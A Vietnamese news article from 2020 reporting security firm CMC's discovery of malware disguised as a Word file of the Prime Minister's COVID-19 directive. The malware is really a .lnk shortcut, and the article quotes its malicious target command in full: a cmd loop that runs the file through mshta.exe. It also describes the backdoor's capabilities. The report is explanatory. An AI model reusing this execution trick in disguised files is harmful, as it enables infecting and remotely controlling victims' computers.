-
Bóng đá Đông Nam Á đứng trước cơ hội lịch sử: U23 Việt Nam và U23 Thái Lan cùng dắt tay nhau vào Tứ kết? -
Hơn 100 người ngộ độc sau khi ăn bánh mì: Cơ sở ở Phú Mỹ bị ‘tuýt còi’, mức phạt khiến nhiều người sốc -
Vụ ôtô 5 chỗ bị vò nát sau tai nạn liên hoàn: Gia đình thông tin nóng về tình hình 4 người trong xe -
Cô gái mặc bikini chơi pickleball chính thức lên tiếng sau loạt tranh cãi, tuyên bố 1 câu "xanh rờn" -
Lễ tang Đại tướng Lê Văn Dũng được tổ chức theo nghi thức cấp Nhà nước -
Hoàng Hoa Trung – chủ dự án Nuôi Em đồng loạt bị réo tên trên các page lớn, rộ tin đồn gặp biến lớn? -
Đồ hộp Hạ Long bất ngờ đăng thông báo về công nghệ "tiêu diệt virus tả lợn châu Phi" rồi nhanh chóng gỡ bỏ -
Bê bối thịt bẩn Đồ hộp Hạ Long: Ai đứng sau "lỗ hổng" quản lý khiến người tiêu dùng hoang mang? -
Em gái Đặng Văn Lâm "lột xác" ngoạn mục tuổi 18: Visual "lai tây" cực phẩm, chiều cao 1m80 chuẩn siêu mẫu -
Công bố danh sách phạt nguội 24 giờ qua tại Hà Nội, camera AI giao thông ghi nhận hàng loạt vi phạm bất ngờ
Công nghệ
10/03/2020 17:00Xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch COVID-19
Thông tin từ Tập đoàn công nghệ CMC cho biết, lợi dụng tình hình căng thẳng của dịch COVID-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển (từng tấn công các tổ chức tại Việt Nam năm 2019), được phát hiện đã thực hiện mạo danh văn 3 bản thông báo của chính phủ về tình hình dịch.

Cụ thể, mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. File mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.
Tuy nhiên, theo các chuyên gia, file Word này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: "%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i" .
Nếu được thực thi, mã độc nói trên sẽ tự tạo ra các bản sao, đồng thời tự kích hoạt khả năng chạy mỗi khi khởi động máy tính. Bên cạnh đó, mã độc này sẽ tạo backdoor cho phép kẻ tấn công có thể thực thi lệnh từ xa, đồng thời hỗ trợ chạy nhiều lệnh khác nhau như tải file, lấy thông tin máy tính và người dùng.
"Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp" - các chuyên gia của CMC nhận định.
Duy Anh (Nguoiduatin.vn)
- Bóng đá Đông Nam Á đứng trước cơ hội lịch sử: U23 Việt Nam và U23 Thái Lan cùng dắt tay nhau vào Tứ kết? (55 phút trước)
- Tôi gác việc ở nhà làm "bố bỉm" toàn thời gian: 6 tháng kiệt sức và bài học về nỗi ám ảnh mang tên bát cháo (58 phút trước)
- Hơn 100 người ngộ độc sau khi ăn bánh mì: Cơ sở ở Phú Mỹ bị ‘tuýt còi’, mức phạt khiến nhiều người sốc (59 phút trước)
- Nam ca sĩ nổi tiếng tử nạn máy bay, xót xa lời tiên tri về cái chết được dự báo trước (1 giờ trước)
- Hiểm họa khôn lường từ thói quen đi sát nhau của các tài xế xe máy (1 giờ trước)
- Bắt giữ thanh niên 10X đột nhập nhà, khống chế cụ bà 87 tuổi để cướp tài sản (1 giờ trước)
- Thế giới nín thở chờ quyết định của ông Trump: Những kịch bản can thiệp vào Iran được đặt lên bàn nghị sự (1 giờ trước)
- Hài hước rạp Việt công khai "năn nỉ" web lậu gỡ siêu phẩm hoạt hình 6000 tỷ trước giờ ra mắt (1 giờ trước)
- Đây là iPhone Pro Max rẻ nhất Việt Nam có Dynamic Island, đứng cạnh iPhone 17 Pro Max không lép vế (1 giờ trước)
- Vụ ôtô 5 chỗ bị vò nát sau tai nạn liên hoàn: Gia đình thông tin nóng về tình hình 4 người trong xe (1 giờ trước)